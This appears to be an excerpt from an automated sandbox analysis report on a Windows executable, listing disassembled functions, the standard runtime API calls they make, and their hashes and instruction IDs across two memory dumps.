                                                              • API String ID: 4218353326-1793514501
                                                              • Opcode ID: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
                                                              • Instruction ID: dfdaef210c9fde1e563ad86d0075ca4844e5c450f328af3dc752b2d50a02e017
                                                              • Opcode Fuzzy Hash: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
                                                              • Instruction Fuzzy Hash: 68B1DFE2B042005BD7006A669C5162B65D98FD1359F09453FEF4AF33C2FA3EDE19829B
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00459CCA,?,?,00000000,00000000,00000000,?), ref: 00459DE9
                                                              • CatchIt.LIBVCRUNTIME ref: 00459ECF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CatchEncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 1435073870-2084237596
                                                              • Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                              • Instruction ID: 680bccfe0e0854ffc158b5e00edb6862103a1416f9df0b4f366e0dcb6488795f
                                                              • Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                              • Instruction Fuzzy Hash: 34416871900209EFDF15DF98CD82AAEBBB5FF48305F18805AF904672A2D3399D54DB58
                                                              APIs
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 008DA050
                                                              • CatchIt.LIBVCRUNTIME ref: 008DA136
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CatchEncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 1435073870-2084237596
                                                              • Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                              • Instruction ID: 493c5ded0e824050eee54d310ba580054d01e7971bf862ddb4784a349464d280
                                                              • Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                              • Instruction Fuzzy Hash: A3416D71900209EFCF1ADF98CD81AEEBBB5FF48300F28825AF919A7251D3359950DB52
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8), ref: 00456D3E
                                                              • GetLastError.KERNEL32(?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8,?,^D,0044C1B0), ref: 00456D48
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,^D,0044C1B0,0044C294,00000003,0044069B,?,?,?,?,00000000,0045FB2F,004058C6), ref: 00456D70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID: api-ms-
                                                              • API String ID: 3177248105-2084034818
                                                              • Opcode ID: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
                                                              • Instruction ID: 0ecaf6013e36b0431d801e3916b08b76fdb95d3f1c140b132a01747a849ad822
                                                              • Opcode Fuzzy Hash: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
                                                              • Instruction Fuzzy Hash: 04E012303C4204B7DB101B61DC06B593A789B10B56F540431FD0DA51E1EBF5A858954E
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(2263B8EC,00455523,00000000,?), ref: 004507AD
                                                                • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00450A08
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00450A50
                                                              • GetLastError.KERNEL32 ref: 00450AF3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                              • String ID:
                                                              • API String ID: 2112829910-0
                                                              • Opcode ID: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
                                                              • Instruction ID: e52ebc46d8e9f13757024da4890b50ba647b118a1bf42f91cd2d0be3dbea7dc8
                                                              • Opcode Fuzzy Hash: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
                                                              • Instruction Fuzzy Hash: A0D17BB9D00248AFDF15CFA8C8809EDBBB4FF09315F18816AE855E7352E734A946CB54
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(0046B080,008D578A,00000000,?), ref: 008D0A14
                                                                • Part of subcall function 008D346A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,008D578A,008D578A,008C3F62,008D0768,0000FDE9,00000000,?,?,?,008D1067,0000FDE9,00000000,?), ref: 008D3516
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008D0C6F
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 008D0CB7
                                                              • GetLastError.KERNEL32 ref: 008D0D5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                              • String ID:
                                                              • API String ID: 2112829910-0
                                                              • Opcode ID: f7a2fa6a9c7b7c2702c5415ca5342024ae727f2fb94ff8ae16218cd9c601ae44
                                                              • Instruction ID: 4202879ebbf7e7b1f2be5da2a6d8b42f324f0a7c1b40d7ebf2c5d0a5ee6fb655
                                                              • Opcode Fuzzy Hash: f7a2fa6a9c7b7c2702c5415ca5342024ae727f2fb94ff8ae16218cd9c601ae44
                                                              • Instruction Fuzzy Hash: 21D13775D046589FCB15CFE8D880AADBBB5FF09314F28822AE855EB352E730A941CF51
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
                                                              • Instruction ID: 4fadf7dd59c53bd1b12e0029445d2e83e107cc747934abb9f5ec8e89f131d8d2
                                                              • Opcode Fuzzy Hash: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
                                                              • Instruction Fuzzy Hash: 8C51F276A14202EFDB289F11D981BAA73A4EF18706F14452FEC0157292E73DEC49CB99
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: e549594ee335f88c809106c5544a2f4baf43b5eb7b90bfa02ae88c691973c827
                                                              • Instruction ID: 3184407fc1a60f4943d86c1fb39e04126ab0c7338d7833b765227d854833ac16
                                                              • Opcode Fuzzy Hash: e549594ee335f88c809106c5544a2f4baf43b5eb7b90bfa02ae88c691973c827
                                                              • Instruction Fuzzy Hash: F251E072600616EFDB288F58C881BAA77A9FF44310F14422FE889C7391EB31ED41CB95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
                                                              • Instruction ID: a7f2c4688ec43d2a23ac8beb8ca83e3134fddb6ab0c13f52a90a8fe9f94a791d
                                                              • Opcode Fuzzy Hash: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
                                                              • Instruction Fuzzy Hash: EE412AF2A00304AFD7249F79CC42B6AFBE8EB84756F10452FF551DB382D2B99A058784
                                                              APIs
                                                              • VirtualQuery.KERNEL32(83000000,2263B8EC,0000001C,2263B8EC,?,?,?), ref: 0044C7B6
                                                              • __FindPESection.LIBCMT ref: 0044C7F3
                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 0044C813
                                                              • __FindPESection.LIBCMT ref: 0044C82D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FindSection$HandlersQueryScopeTableValidateVirtual
                                                              • String ID:
                                                              • API String ID: 1876002356-0
                                                              • Opcode ID: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
                                                              • Instruction ID: 16c3c4676ac924f9bbc116e317de4c153b4417dc4f771cedf4f7c3d11fae8c19
                                                              • Opcode Fuzzy Hash: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
                                                              • Instruction Fuzzy Hash: CF31B5B5E022159BFF54CBA9A9C07BE73A4EB09315F09007ADD41E7352E739DC018BA9
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,008CD289,000000FF,0046B0C0,008B6A8C,00000000,00885C9A,?,008CD03D,00000021,00465044,0046503C,00465044,008B6A8C), ref: 008CD23D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                              • Instruction ID: 212059d943ce3e965e7d3025c3cf6d8c3fa8a2732f1ed77cb9161e5c6fa4c3e8
                                                              • Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                              • Instruction Fuzzy Hash: F621C631A41310A7DB21ABA4EC90F5A7778FB41774B250239EC15E7291E770FD00C6D5
                                                              APIs
                                                              • SetFilePointerEx.KERNEL32(?,00000000,00000000,004481E1,00000001,?,004481E1,h5@,?,00000000), ref: 00450F57
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F64
                                                              • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F8A
                                                              • SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00450FB0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FilePointer$ErrorLast
                                                              • String ID:
                                                              • API String ID: 142388799-0
                                                              • Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                              • Instruction ID: 1514e75016c253887b100742bd2e0aa0853bf3b84a7615600f3982ba0bc5b80c
                                                              • Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                              • Instruction Fuzzy Hash: B1116636805219ABDF209F51CC48A9F3F7DFB00725F004115FC20922A1D7B19A40CAA5
                                                              APIs
                                                              • SetFilePointerEx.KERNEL32(?,00000000,00000000,008C8448,00000001,?,008C8448,008837CF,?,00000000), ref: 008D11BE
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,008837CF,00000000), ref: 008D11CB
                                                              • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,008837CF,00000000), ref: 008D11F1
                                                              • SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008D1217
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FilePointer$ErrorLast
                                                              • String ID:
                                                              • API String ID: 142388799-0
                                                              • Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                              • Instruction ID: ee4b8429ace340c2c4686603bfc52f1f78aa5c7c0322558fc642b61b8f34742b
                                                              • Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                              • Instruction Fuzzy Hash: EB115775904219BBCF109F55EC48A9E7F7DFF04760F108255F820E22A0E7B1DA50DBA5
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455DBC
                                                              • GetLastError.KERNEL32(?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104,00446C37), ref: 00455DC6
                                                              • __dosmaperr.LIBCMT ref: 00455DCD
                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000), ref: 00455DF7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FullNamePath$ErrorLast__dosmaperr
                                                              • String ID:
                                                              • API String ID: 1391015842-0
                                                              • Opcode ID: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
                                                              • Instruction ID: 83aad2bcbc88ad1b691cbbc28925ead7dadcf548e2ab308fdfae5f9a37bb2b5e
                                                              • Opcode Fuzzy Hash: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
                                                              • Instruction Fuzzy Hash: 50F0A436200700AFDB205F67CC09E277BBDEF45361710842AF956C2521DB76EC14CB68
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001), ref: 00455E22
                                                              • GetLastError.KERNEL32(?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104), ref: 00455E2C
                                                              • __dosmaperr.LIBCMT ref: 00455E33
                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455E5D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FullNamePath$ErrorLast__dosmaperr
                                                              • String ID:
                                                              • API String ID: 1391015842-0
                                                              • Opcode ID: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
                                                              • Instruction ID: 58d23dfaa7b1bff066b533c88cf6507f29fdd6be1c16f2e24496f8287ce13408
                                                              • Opcode Fuzzy Hash: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
                                                              • Instruction Fuzzy Hash: 49F0A436200600AFDF205F72DC09E2B7BADEF44361714842AF959D2121DB75EC14CB58
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,008D5F06,00000000,?,008DB683,008D5F06,008C6E9E,?,00000000,00000104,?,00000001,00000000), ref: 008D6023
                                                              • GetLastError.KERNEL32(?,008DB683,008D5F06,008C6E9E,?,00000000,00000104,?,00000001,00000000,00000000,?,008D5F06,?,00000104,008C6E9E), ref: 008D602D
                                                              • __dosmaperr.LIBCMT ref: 008D6034
                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,008DB683,008D5F06,008C6E9E,?,00000000,00000104,?,00000001,00000000,00000000), ref: 008D605E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FullNamePath$ErrorLast__dosmaperr
                                                              • String ID:
                                                              • API String ID: 1391015842-0
                                                              • Opcode ID: c7c4edbd7a7b70f3d07427bfb556099335345e9fdb19da3b7b6c0357393f98ce
                                                              • Instruction ID: 0b1c0cba288c76db96bc1252fc0a3a3f748d338e9e2ffca63a9738c957208b99
                                                              • Opcode Fuzzy Hash: c7c4edbd7a7b70f3d07427bfb556099335345e9fdb19da3b7b6c0357393f98ce
                                                              • Instruction Fuzzy Hash: E2F0A436200604AFDB309FA6DC04E177BADFF44360B10852AF556D2620EB71EC20CB61
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,008D5F06,00000000,?,008DB60B,008D5F06,008D5F06,008C6E9E,?,00000000,00000104,?,00000001), ref: 008D6089
                                                              • GetLastError.KERNEL32(?,008DB60B,008D5F06,008D5F06,008C6E9E,?,00000000,00000104,?,00000001,00000000,00000000,?,008D5F06,?,00000104), ref: 008D6093
                                                              • __dosmaperr.LIBCMT ref: 008D609A
                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,008DB60B,008D5F06,008D5F06,008C6E9E,?,00000000,00000104,?,00000001,00000000), ref: 008D60C4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FullNamePath$ErrorLast__dosmaperr
                                                              • String ID:
                                                              • API String ID: 1391015842-0
                                                              • Opcode ID: a72e1de69e8ac08235e0b59f4006df7dc26bf1db3731920fcb84235d1ad79fd5
                                                              • Instruction ID: 3f62a7a2ce49e12150ce6c476b032970bf32c2b77e09dd05c41f9f44e44cbfdc
                                                              • Opcode Fuzzy Hash: a72e1de69e8ac08235e0b59f4006df7dc26bf1db3731920fcb84235d1ad79fd5
                                                              • Instruction Fuzzy Hash: 77F0A436200A14AFDB205B76DC04E5BBBADFF44360710892AF556D2620EBB1EC208B61
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000), ref: 0045BD1F
                                                              • GetLastError.KERNEL32(?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?,?,00450492,00443CFB), ref: 0045BD2B
                                                                • Part of subcall function 0045BD7C: CloseHandle.KERNEL32(FFFFFFFE,0045BD3B,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?), ref: 0045BD8C
                                                              • ___initconout.LIBCMT ref: 0045BD3B
                                                                • Part of subcall function 0045BD5D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0045BCF9,00459F57,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD70
                                                              • WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                              • Instruction ID: a34e4e029ef2e4d5dd3ba3bcd054cc3c3a598788143b8b19420d5231d0b345e8
                                                              • Opcode Fuzzy Hash: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                              • Instruction Fuzzy Hash: 0CF0F836140119BBCF221F959C08ADA3F3AEF493A1F044021FE09D5171D7B28864ABD9
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 008BDA16
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 008BDACA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 3480331319-1018135373
                                                              • Opcode ID: 4e5ede0b4027151e909a7cfdd177c32462acfec368dfe8ef4ee5f082c53f6a08
                                                              • Instruction ID: aa2279353376ec55a6621422434af98a83bfdfc9dda819fca65ccded91cce0d9
                                                              • Opcode Fuzzy Hash: 4e5ede0b4027151e909a7cfdd177c32462acfec368dfe8ef4ee5f082c53f6a08
                                                              • Instruction Fuzzy Hash: E2419030A04219ABCF10DF68C880ADE7FB5FF45314F148199E818DB392E775EA05CB92
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 004598A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ___except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3493665558-3733052814
                                                              • Opcode ID: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
                                                              • Instruction ID: 4df6c2a030d07bf616ce91cf83237d0554f1a363a859cf179326f8a266afaebb
                                                              • Opcode Fuzzy Hash: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
                                                              • Instruction Fuzzy Hash: 0E31C4B6400219EBCF269F51CC4096A7B65FF0A716B18419FFC5449323C73ACC66DB8A
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 008D9B0D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ___except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3493665558-3733052814
                                                              • Opcode ID: bd77938e174d17ab149a6bce2b14a2ddc10501c9168853feaa912111e58622ef
                                                              • Instruction ID: a64d31d140b149e9fb0911022cbbf58af9256a9b203aa70141654bcd35a0955b
                                                              • Opcode Fuzzy Hash: bd77938e174d17ab149a6bce2b14a2ddc10501c9168853feaa912111e58622ef
                                                              • Instruction Fuzzy Hash: 3631A372400228DBCF265F54EC4596A7B66FF09325B1A435BF8D489321C733CC61DB81